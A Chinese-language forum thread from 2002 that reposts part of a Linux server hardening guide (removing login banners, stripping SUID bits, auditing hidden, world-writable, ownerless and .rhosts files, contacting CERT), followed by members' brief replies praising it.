[root@deep]# chmod -R 700 /etc/rc.d/init.d/*
这样只有root可以读、写和执行这个目录下的脚本。我想一般用户没有什么必要知道脚本文件的内容。
注意:如果你安装或升级了一个程序,要用到“/etc/rc.d/init.d/”中system V脚本,不要忘记再检查一下改变和检查这个脚本文件的许可。

33. “/etc/rc.d/rc.local”文件
在默认情况下,当登录装有Linux系统的计算机时,系统会告诉你Linux发行版的名字、版本号、内核版本和服务器名称。这泄露了太多的系统信息。最好只显示一个“Login:”的提示信息。
第一步
编辑“/ect/rc.d/rc.local”文件,在下面这些行的前面加上“#”:
--
# This will overwrite /etc/issue at every boot. So, make any changes you
# want to make to /etc/issue here or you will lose them when you reboot.
#echo "" > /etc/issue
#echo "$R" >> /etc/issue
#echo "Kernel $(uname -r) on $a $(uname -m)" >> /etc/issue
#
#cp -f /etc/issue /etc/issue.net
#echo >> /etc/issue
--
第二步
删除“/etc”目录下的“issue.net”和“issue”文件:
[root@deep]# rm -f /etc/issue
[root@deep]# rm -f /etc/issue.net
注意:“/etc/issue.net”文件是用户从网络登录计算机时(例如:telnet、SSH),看到的登录提示。同样在“/etc”目录下还有一个“issue”文件,是用户从本地登录时看到的提示。这两个文件都是文本文件,可以根据需要改变。但是,如果想删掉这两个文件,必须向上面介绍的那样把“/etc/rc.d/rc.local”脚本中的那些行注释掉,否则每次重新启动的时候,系统又会重新创建这两个文件。

34. 带“s”位的程序
用ls -l命令列出来的文件,如果文件的权限位中出现“s”,则这些文件的SUID(-rwsr-xr-x)或SGID(-r-xr-sr-x)位被设定了。因为这些程序给执行它的用户一些特权,所以如果不需要用到这些特权,最好把这些程序的“s”位移去。可以用下面这个命令“chmod a -s 文件名”移去相应文件的“s”位。
可以清除“s”位的程序包括但不限于:
1) 重来不用的程序
2) 不希望非root用户运行的程序
3) 偶尔用用,但是不介意先用su命令变为root后再运行。
下面加了星号(*)的程序,我个人认为有必要移去“s”位。注意,系统可能需要一些SUID的程序才能正常运行,所以要千万小心。
* 用下面的命令查找所有带“s”位的程序:
[root@deep]# find / -type f ( -perm -04000 -o -perm -02000 ) -exec ls -lg {} ;
*-rwsr-xr-x 1 root root 35168 Sep 22 23:35 /usr/bin/chage
*-rwsr-xr-x 1 root root 36756 Sep 22 23:35 /usr/bin/gpasswd
*-r-xr-sr-x 1 root tty 6788 Sep 6 18:17 /usr/bin/wall
-rwsr-xr-x 1 root root 33152 Aug 16 16:35 /usr/bin/at
-rwxr-sr-x 1 root man 34656 Sep 13 20:26 /usr/bin/man
-r-s--x--x 1 root root 22312 Sep 25 11:52 /usr/bin/passwd
-rws--x--x 2 root root 518140 Aug 30 23:12 /usr/bin/suidperl
-rws--x--x 2 root root 518140 Aug 30 23:12 /usr/bin/sperl5.00503
-rwxr-sr-x 1 root slocate 24744 Sep 20 10:29 /usr/bin/slocate
*-rws--x--x 1 root root 14024 Sep 9 01:01 /usr/bin/chfn
*-rws--x--x 1 root root 13768 Sep 9 01:01 /usr/bin/chsh
*-rws--x--x 1 root root 5576 Sep 9 01:01 /usr/bin/newgrp
*-rwxr-sr-x 1 root tty 8328 Sep 9 01:01 /usr/bin/write
-rwsr-xr-x 1 root root 21816 Sep 10 16:03 /usr/bin/crontab
*-rwsr-xr-x 1 root root 5896 Nov 23 21:59 /usr/sbin/usernetctl
*-rwsr-xr-x 1 root bin 16488 Jul 2 10:21 /usr/sbin/traceroute
-rwxr-sr-x 1 root utmp 6096 Sep 13 20:11 /usr/sbin/utempter
-rwsr-xr-x 1 root root 14124 Aug 17 22:31 /bin/su
*-rwsr-xr-x 1 root root 53620 Sep 13 20:26 /bin/mount
*-rwsr-xr-x 1 root root 26700 Sep 13 20:26 /bin/umount
*-rwsr-xr-x 1 root root 18228 Sep 10 16:04 /bin/ping
*-rwxr-sr-x 1 root root 3860 Nov 23 21:59 /sbin/netreport
-r-sr-xr-x 1 root root 26309 Oct 11 20:48 /sbin/pwdb_chkpwd
* 用下面的命令禁止上面选出来的SUID的程序:
[root@deep]# chmod a-s /usr/bin/chage
[root@deep]# chmod a-s /usr/bin/gpasswd
[root@deep]# chmod a-s /usr/bin/wall
[root@deep]# chmod a-s /usr/bin/chfn
[root@deep]# chmod a-s /usr/bin/chsh
[root@deep]# chmod a-s /usr/bin/newgrp
[root@deep]# chmod a-s /usr/bin/write
[root@deep]# chmod a-s /usr/sbin/usernetctl
[root@deep]# chmod a-s /usr/sbin/traceroute
[root@deep]# chmod a-s /bin/mount
[root@deep]# chmod a-s /bin/umount
[root@deep]# chmod a-s /bin/ping
[root@deep]# chmod a-s /sbin/netreport
如果你想知道这些程序到底有什么用,可以用man命令查看帮助。
例如:
[root@deep]# man netreport

35. 异常和隐含文件
在系统的每个地方都要查看一下有没有异常和隐含文件(点号是起始字符的,用“ls”命令看不到的文件),因为这些文件可能是隐藏的黑客工具或者其它一些信息(口令破解程序、其它系统的口令文件,等等)。在UNIX下,一个常用的技术就是用一些特殊的名,如:“...”、“.. ”(点点空格)或“..^G”(点点control-G),来隐含文件或目录。用“find”程序可以查找到这些隐含文件。
例如:
[root@deep]# find / -name ".. " -print -xdev
[root@deep]# find / -name ".*" -print -xdev | cat -v
同时也要注意象“.xx”和“.mail”这样的文件名的。(这些文件名看起来都很象正常的文件名)

36. 查找所有SUID/SGID位有效的文件
系统中SUID和SGID文件很有可能成为安全隐患,必须被严密监控。因为这些程序都给执行它的用户一些特权,所以要确保危险的SUID程序没有被安装。
黑客常常利用SUID程序,故意留下一个SUID的程序作为下次进入系统的后门。注意系统中所有的SUID和SGID的程序,并跟踪它们,这样你就可以尽早发现入侵者。
用下面的命令查找系统中所有的SUID和SGID程序:
[root@deep]# find / -type f ( -perm -04000 -o -perm -02000 ) -exec ls -lg {} ;
注意:参考《第九章 安全软件》中关于sXid的介绍,sXid可以为你每天自动的完成这项任务,并用email报告结果。

37. 查找任何人都有写权限的文件和目录
如果黑客获得并改变了一些系统文件,这些系统文件就会成为安全漏洞。任何人都有写权限的目录也同样有危险,因为黑客可以根据他们的需要自由地添加或删除文件。在正常情况下有些文件是可写的,包括一些“/dev”目录下的文件和符号连接。
在系统中定位任何人都有写权限的文件和目录用下面的命令:
[root@deep]# find / -type f ( -perm -2 -o -perm -20 ) -exec ls -lg {} ;
[root@deep]# find / -type d ( -perm -2 -o -perm -20 ) -exec ls -ldg {} ;
注意:象Tripware软件这样的文件和目录完整性的检查器能够扫描、管理和方便地发现被改变过的任何人都有写权限的文件。参考《第九章 安全软件》以获得关于Tripware的更多信息。

38. 查找没有主人的文件
发现没有主人的文件就意味着有黑客入侵你的系统了。不能允许没有主人的文件存在。如果在系统中发现了没有主人的文件或目录,先查看它的完整性,如果一切正常,给它一个主人。有时候卸载程序可能会出现一些没有主人的文件或目录,在这种情况下可以把这些文件和目录删除掉。
定位系统中没有主人的文件用下面的命令:
[root@deep]# find / -nouser -o -nogroup
注意:不用管“/dev”目录下的那些文件。

39. 查找“.rhosts”文件
查找“.rhosts”文件是日常管理工作的一部分,因为这些文件不允许在系统中存在。记住,黑客有可能只要有一个帐号就可能入侵整个网络。
可以用下面的命令定位系统中的“.rhosts”文件:
[root@deep]# find /home -name .rhosts
也可以用一个cron任务定期地查看、报告和删除$HOME/.rhosts文件。同时,也必须让用户知道你会经常地进行这种审核。
用root身份在“/etc/cron.daily”目录下,创建“find_rhosts_files”脚本文件(touch /etc/cron.daily/find_rhosts_files),并在脚本文件中加入下面几行:
#!/bin/sh
/usr/bin/find /home -name .rhosts | (cat <<EOF
This is an automated report of possible existent ".rhosts" files on the server
deep.openarch.com, generated by the find utility command.
New detected ".rhosts" files under the "/home" directory include:
EOF
cat
) | /bin/mail -s "Content of .rhosts file audit report" root
然后,让这个脚本可执行,把所有者和组设置成“root”:
[root@deep]# chmod 755 /etc/cron.daily/find_rhosts_files
[root@deep]# chown 0.0 /etc/cron.daily/find_rhosts_files
每一天都会有一份主题为“Content of .rhosts file audit report”的邮件发给“root”,报告新发现的“.rhosts”文件。

40. 系统已经被黑客控制
如果你确信系统已经被黑客控制,赶快联系CERT(r) Coordination Center或FIRST(Forum of Incident Response and Security Teams)。
电子邮件:cert@cert.org
CERT热线电话:(+1) 412-268-7090
传真:(+1) 412-268-6989
CERT/CC的人员在工作日回答问题的时间是:8:00 a.m. - 8:00 p.m. EST (GMT -5)/EDT (GMT -4));在其它时间或者节假日他们也接收紧急求救电话。

[ 此消息由 扑街 在 2002-06-15.01:37:57 编辑过 ]
----------------------------------------------------------
今生无缘,泪如雨下,我试着忘记红尘中你留下的故事,可数日以来我始终无法走出你曾给我的感情世界,我深知让往事随风不是说说那么容易的. 天空下我们彼此站成了两个无法相溶的世界我却又总想忍住悲伤,而思念像穿透了灵魂一般不可抑制

编辑 删除 发表时间发表于 2002-06-15.01:32:18   MSIE 6.0b Windows 98IP: 已记录
扑街帅哥哦
级别:管理员
威望:4
经验:131
货币:6128
体力:100
来源:青山精神病院
总发帖数:2271
注册日期:2001-07-23
查看 邮件 主页 QQ 消息 引用 复制 下载 

原文由 痞菜 发表:
比较不错的东西



:)一攻一防,此文为转贴!
----------------------------------------------------------
今生无缘,泪如雨下,我试着忘记红尘中你留下的故事,可数日以来我始终无法走出你曾给我的感情世界,我深知让往事随风不是说说那么容易的. 天空下我们彼此站成了两个无法相溶的世界我却又总想忍住悲伤,而思念像穿透了灵魂一般不可抑制

编辑 删除 发表时间发表于 2002-06-15.01:35:00   MSIE 6.0b Windows 98IP: 已记录
痞菜帅哥哦
级别:管理员
威望:9
经验:18
货币:99999
体力:100
来源:不知道
总发帖数:2602
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

记得哪个是 linuxaid 最先汉化的 应该是翻译的

外国人的经典东西 呵呵 作者不知道在中国发扬广大了
----------------------------------------------------------

哈哈

编辑 删除 发表时间发表于 2002-06-15.02:50:47   MSIE 5.01 Windows 2000IP: 已记录
痞菜帅哥哦
级别:管理员
威望:9
经验:18
货币:99999
体力:100
来源:不知道
总发帖数:2602
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

这两个都不错 呵呵 再看都有收获呀
----------------------------------------------------------

哈哈

编辑 删除 发表时间发表于 2002-06-15.02:54:03   MSIE 5.01 Windows 2000IP: 已记录
扑街帅哥哦
级别:管理员
威望:4
经验:131
货币:6128
体力:100
来源:青山精神病院
总发帖数:2271
注册日期:2001-07-23
查看 邮件 主页 QQ 消息 引用 复制 下载 

哈,这两篇都是比较旧的文章,但每次再看,感觉不同。
----------------------------------------------------------
今生无缘,泪如雨下,我试着忘记红尘中你留下的故事,可数日以来我始终无法走出你曾给我的感情世界,我深知让往事随风不是说说那么容易的. 天空下我们彼此站成了两个无法相溶的世界我却又总想忍住悲伤,而思念像穿透了灵魂一般不可抑制

编辑 删除 发表时间发表于 2002-06-15.03:05:44   MSIE 6.0b Windows 98IP: 已记录
痞菜帅哥哦
级别:管理员
威望:9
经验:18
货币:99999
体力:100
来源:不知道
总发帖数:2602
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

我转的哪个是我头次看见的
----------------------------------------------------------

哈哈

编辑 删除 发表时间发表于 2002-06-15.03:07:17   MSIE 5.01 Windows 2000IP: 已记录
★帅の蟑螂帅哥哦
级别:管理员
威望:0
经验:20
货币:4114
体力:100
来源:127.0.0.1
总发帖数:3059
注册日期:2001-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

嘿嘿,那文章你转来这里了呀
----------------------------------------------------------
为了明天奢侈糜烂的生活而奋斗

编辑 删除 发表时间发表于 2002-06-15.06:37:56   MSIE 6.0 Windows 2000IP: 已记录
痞菜帅哥哦
级别:管理员
威望:9
经验:18
货币:99999
体力:100
来源:不知道
总发帖数:2602
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

嘿嘿 好东西没人看呀 呵呵 建议大家都看看 看不懂也要看
----------------------------------------------------------

哈哈

编辑 删除 发表时间发表于 2002-06-15.13:22:30   MSIE 5.01 Windows 2000IP: 已记录
扑街帅哥哦
级别:管理员
威望:4
经验:131
货币:6128
体力:100
来源:青山精神病院
总发帖数:2271
注册日期:2001-07-23
查看 邮件 主页 QQ 消息 引用 复制 下载 

可惜,真的没什么人看,:)
----------------------------------------------------------
今生无缘,泪如雨下,我试着忘记红尘中你留下的故事,可数日以来我始终无法走出你曾给我的感情世界,我深知让往事随风不是说说那么容易的. 天空下我们彼此站成了两个无法相溶的世界我却又总想忍住悲伤,而思念像穿透了灵魂一般不可抑制

编辑 删除 发表时间发表于 2002-06-15.17:38:55   MSIE 6.0b Windows 98IP: 已记录
lansing帅哥哦
级别:精灵王
威望:0
经验:3
货币:1287
体力:68.9
来源:河北保定
总发帖数:867
注册日期:2002-03-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

我好想在那里也看见过
不是在鹰派
不过我菜
看不懂
----------------------------------------------------------
处于极度郁闷中~~~~~~~~~~~~~

编辑 删除 发表时间发表于 2002-06-15.18:15:40   MSIE 6.0 Windows XPIP: 已记录
jason0201帅哥哦
级别:本站元老
威望:5
经验:0
货币:4475
体力:100
来源:天津
总发帖数:1483
注册日期:2002-03-26
查看 邮件 主页 QQ 消息 引用 复制 下载 

if you wanna be a real expert can't drop linux.
i am learning that.
and this is really a good article whatever you can realize it
----------------------------------------------------------
I AM JASON0201 REMEMBER NEVER TOO LATE TO LEARN


编辑 删除 发表时间发表于 2002-06-15.19:24:14   MSIE 6.0 Windows 98IP: 已记录
飞静帅哥哦
级别:精灵王
威望:0
经验:2
货币:2029
体力:100
来源:广西
总发帖数:562
注册日期:2002-04-02
查看 邮件 主页 QQ 消息 引用 复制 下载 

努力看它哦!
----------------------------------------------------------
孤独是可耻的,因为我孤独,所以我是可耻的!!....

编辑 删除 发表时间发表于 2002-06-15.19:29:09   MSIE 5.01 Windows 2000IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符

[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题